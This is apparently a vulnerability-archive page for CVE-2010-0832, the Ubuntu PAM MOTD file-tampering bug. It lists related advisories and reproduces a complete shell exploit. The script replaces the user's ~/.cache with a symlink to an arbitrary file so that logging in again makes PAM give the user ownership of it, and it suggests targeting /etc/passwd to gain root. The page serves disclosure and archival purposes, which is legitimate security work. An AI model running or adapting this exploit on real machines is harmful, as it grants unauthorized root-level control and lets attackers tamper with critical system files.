Ubuntu PAM MOTD File Tampering (Privilege Escalation)

🗓️ 10 Jul 2010 00:00:00Reported by RootType

Ubuntu PAM MOTD File Tampering (Privilege Escalation) on 10.04 LT

Reporter	Title	Published	Views	Family All 28
0day.today	Ubuntu PAM MOTD Local Root Exploit	12 Jul 201000:00	–	zdt
0day.today	Ubuntu PAM MOTD File Tampering (Privilege Escalation)	8 Jul 201000:00	–	zdt
Circl	CVE-2010-0832	8 Jul 201000:00	–	circl
CVE	CVE-2010-0832	12 Jul 201016:00	–	cve
Cvelist	CVE-2010-0832	12 Jul 201016:00	–	cvelist
Debian CVE	CVE-2010-0832	12 Jul 201016:00	–	debiancve
Exploit DB	Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)	8 Jul 201000:00	–	exploitdb
Exploit DB	Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)	12 Jul 201000:00	–	exploitdb
EUVD	EUVD-2010-0857	7 Oct 202500:30	–	euvd
exploitpack	Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (1)	8 Jul 201000:00	–	exploitpack


                                                #!/bin/sh
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen &lt;[email protected]&gt;
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
 
if [ $# -eq 0 ]; then
    echo &quot;Usage: $0 /path/to/file&quot;
    exit 1
fi
 
mkdir $HOME/backup 2&gt; /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2&gt; /dev/null
echo &quot;\n@@@ File before tampering ...\n&quot;
ls -l $1
ln -sf $1 $HOME/.cache
echo &quot;\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n&quot;

10 Jul 2010 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.00135